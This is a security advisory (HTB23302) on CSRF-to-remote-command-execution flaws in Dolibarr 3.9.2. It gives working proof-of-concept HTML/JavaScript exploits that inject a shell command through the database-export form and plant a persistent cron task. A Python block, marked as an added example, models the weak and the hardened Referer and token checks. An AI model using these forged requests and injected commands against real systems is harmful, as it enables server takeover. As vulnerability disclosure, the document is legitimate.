Multiple RCEs via CSRF in Dolibarr

Advisory ID: HTB23302
Product: Dolibarr
Vendor: https://www.dolibarr.org/
Vulnerable Versions: 3.9.2 and probably prior
Tested Version: 3.9.2
Advisory Publication: June 10, 2016 [without technical details]
Vendor Notification: June 10, 2016
Public Disclosure: September 26, 2018
Latest Update: October 2, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: Pending
Risk Level: High
CVSSv2 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Discovered and Provided: High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple CSRF vulnerabilities in Dolibarr, a popular ERP and CRM software package. The vulnerabilities may allow a remote attacker to run arbitrary commands on the vulnerable system via a CSRF vector. Successful exploitation can lead to full website and server compromise.

Cross-Site Request Forgery vulnerabilities exist in multiple scripts due to an insufficient implementation of anti-CSRF mechanisms. The web application relies only on the HTTP Referer header to determine the origin of HTTP requests, yet it accepts requests with an empty or absent Referer header. A remote unauthenticated attacker can create a specially crafted malicious web page containing a CSRF exploit, trick a logged-in administrator into visiting the page, spoof the HTTP request as if it were coming from the legitimate administrator, and execute arbitrary OS commands on the vulnerable system.

The PoC code below exploits the vulnerability in the "/admin/tools/export.php" database backup script and creates a "/ls.txt" file in the webroot directory containing the output of the "/bin/ls" command (a directory listing of the current directory):

<script>
url = 'http://dolibarr/admin/tools/export.php';
location = 'data:text/html,<html><meta http-equiv="refresh" content="0; url=data:text/html,<form id=f method=post action=\''+url+'\'><input type=\'hidden\' name=\'export_type\' value=\'server\'><input type=\'hidden\' name=\'what\' value=\'mysql\'><input type=\'hidden\' name=\'mysqldump\' value=\'ls>../../../../../../../../../../ls.txt||\'><input type=\'hidden\' name=\'disable_fk\' value=\'yes\'><input type=\'hidden\' name=\'sql_compat\' value=\'NONE\'><input type=\'hidden\' name=\'sql_structure\' value=\'structure\'><input type=\'hidden\' name=\'drop\' value=\'on\'><input type=\'hidden\' name=\'sql_data\' value=\'data\'><input type=\'hidden\' name=\'showcolumns\' value=\'yes\'><input type=\'hidden\' name=\'extended_ins\' value=\'yes\'><input type=\'hidden\' name=\'hexforbinary\' value=\'yes\'><input type=\'hidden\' name=\'nobin_disable_fk\' value=\'yes\'><input type=\'hidden\' name=\'nobin_drop\' value=\'on\'><input type=\'hidden\' name=\'filename_template\' value=\'12345.sql\'><input type=\'hidden\' name=\'compression\' value=\'bz\'><input type=\'submit\' value=\'Submit request\'></form><script>document.getElementById(\'f\').submit()</scri'+'pt> "></html>';
</script>


Another exploitation technique allows backdoor injection via the "cron" module. The CSRF vulnerability in the "/admin/modules.php" script can be used to activate the "cron" module, and the CSRF in the "/cron/card.php" script to run a scheduled malicious task on the system. Attackers can use this technique to maintain their presence on the compromised system.

The following CSRF exploit activates the "cron" module:

<img src="http://dolibarr/admin/modules.php?id=2300&module_position=500&action=set&value=modCron&mode=common">

The next step is to create a "cron" task using the following code:

<script>
url = 'http://dolibarr/cron/card.php';
location = 'data:text/html,<html><meta http-equiv="refresh" content="0; url=data:text/html,<form id=f method=post action=\''+url+'\'><input type=\'hidden\' name=\'action\' value=\'add\' /><input type=\'hidden\' name=\'label\' value=\'1\' /><input type=\'hidden\' name=\'jobtype\' value=\'command\' /><input type=\'hidden\' name=\'datestart\' value=\'06/08/2016\' /><input type=\'hidden\' name=\'datestartday\' value=\'08\' /><input type=\'hidden\' name=\'datestartmonth\' value=\'06\' /><input type=\'hidden\' name=\'datestartyear\' value=\'2016\' /><input type=\'hidden\' name=\'datestarthour\' value=\'00\' /><input type=\'hidden\' name=\'datestartmin\' value=\'00\' /><input type=\'hidden\' name=\'dateend\' value=\'\' /><input type=\'hidden\' name=\'dateendday\' value=\'\' /><input type=\'hidden\' name=\'dateendmonth\' value=\'\' /><input type=\'hidden\' name=\'dateendyear\' value=\'\' /><input type=\'hidden\' name=\'dateendhour\' value=\'-1\' /><input type=\'hidden\' name=\'dateendmin\' value=\'-1\' /><input type=\'hidden\' name=\'priority\' value=\'0\' /><input type=\'hidden\' name=\'nbfrequency\' value=\'1\' /><input type=\'hidden\' name=\'unitfrequency\' value=\'60\' /><input type=\'hidden\' name=\'module_name\' value=\'\' /><input type=\'hidden\' name=\'classesname\' value=\'\' /><input type=\'hidden\' name=\'objectname\' value=\'\' /><input type=\'hidden\' name=\'methodename\' value=\'\' /><input type=\'hidden\' name=\'params\' value=\'\' /><input type=\'hidden\' name=\'command\' value=\'ls > ../../../../../ls.txt\' /><input type=\'hidden\' name=\'note\' value=\'\' /><input type=\'hidden\' name=\'save\' value=\'Save\' /><input type=\'submit\' value=\'Submit request\' /></form><script>document.getElementById(\'f\').submit()</scri'+'pt>"></html >';
</script>


The task will execute the "/bin/ls" command and write its output to the "/ls.txt" file. The following CSRF exploit triggers execution of the "cron" task:

<img src="http://dolibarr/cron/card.php?action=activate&id=1">
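The root cause described above (a Referer-only check that treats a missing header as a pass) and the three abused endpoints can be modelled side by side. The following is an added example, not Dolibarr's code: it contrasts the weak check with a hardened one that requires a present, matching Origin/Referer and a per-session synchronizer token. The site origin, the endpoint list, the form field name "token" and the refusal of state changes over GET are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://dolibarr"  # assumed deployment origin, matching the PoC host

# Endpoints the advisory shows being abused with forged requests (assumed list).
STATE_CHANGING = {"/admin/tools/export.php", "/admin/modules.php", "/cron/card.php"}


def referer_only_check(headers):
    """Model of the weak check the advisory describes: only the Referer is
    consulted, and a missing or empty Referer is accepted."""
    referer = headers.get("Referer", "")
    if referer == "":
        return True  # the gap the PoC exploits: data: URLs send no Referer at all
    return referer.startswith(SITE_ORIGIN + "/")


def _source_origin(headers):
    """Prefer Origin, fall back to scheme+host of Referer; None when both absent."""
    for name in ("Origin", "Referer"):
        value = headers.get(name, "")
        if value:
            parts = urlsplit(value)
            return f"{parts.scheme}://{parts.netloc}"
    return None


def hardened_check(method, path, headers, form, session):
    """Reject a state-changing request unless the source origin is present and
    matches the site AND the form carries the session's synchronizer token."""
    if path not in STATE_CHANGING:
        return True
    if method != "POST":
        return False  # state changes via GET (e.g. modules.php?action=set) are refused
    if _source_origin(headers) != SITE_ORIGIN:
        return False  # missing Origin/Referer is a failure, not a pass
    expected = session.get("csrf_token", "")
    supplied = form.get("token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return bool(expected) and hmac.compare_digest(expected, supplied)


def new_session():
    """Issue a fresh session carrying an unguessable synchronizer token."""
    return {"csrf_token": secrets.token_hex(32)}
```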


Solution:
Vendor notified, awaiting vendor solution.


References:
[1] High-Tech Bridge Advisory HTB23302 - https://www.immuniweb.com/advisory/HTB23302 - Multiple RCE via CSRF in Dolibarr
[2] Dolibarr - https://www.dolibarr.org/ - Dolibarr ERP & CRM is a modern and easy to use open-source web software package to manage your business (customers, invoices, orders, products, stocks, agenda, emailings, shipments...).
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.